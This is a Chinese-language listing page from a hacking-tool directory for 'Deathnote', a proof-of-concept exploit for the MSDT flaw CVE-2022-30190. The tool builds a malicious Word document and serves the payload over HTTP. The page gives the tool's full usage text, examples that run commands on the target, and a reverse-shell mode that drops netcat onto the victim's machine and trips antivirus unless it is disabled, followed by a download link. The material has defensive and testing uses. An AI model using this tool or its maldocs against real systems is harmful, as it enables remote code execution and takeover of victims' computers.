Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Deathnote — CVE-2022-30190的概念验证 | Kitploit
工具/GitHubGitHub/malwareman007/deathnote
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubmalwareman007/deathnote

Deathnote

CVE-2022-30190的概念验证

查看仓库
38673年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Deathnote

CVE-2022-30190 的概念验证

当 MSDT 通过 URL 协议从调用应用程序(如 Word)调用时,存在一个远程代码执行漏洞。成功利用此漏洞的攻击者可以以调用应用程序的权限运行任意代码。然后,攻击者可以安装程序、查看、更改或删除数据,或在用户权限允许的上下文中创建新帐户。


使用恶意 Microsoft Word 文档创建 "Deathnote" MS-MSDT 攻击,并通过 HTTP 服务器部署载荷。

用法

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: Notepad)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./Deathnote.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

示例

启动 notepad.exe:

root@kitploit:~
$ python3 Deathnote.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000

启动 calc.exe:

root@kitploit:~
$ python3 Deathnote.py -c "calc"

demo

在端口 4444 上获取反向 shell。注意,这会将 netcat 二进制文件下载到受害者机器上,并放置在 C:\Windows\Tasks 中。它不会清理该二进制文件。除非禁用杀毒软件,否则会触发病毒检测。

获取 reverse shell:

root@kitploit:~
python3 Deathnote.py -p 1234
下载工具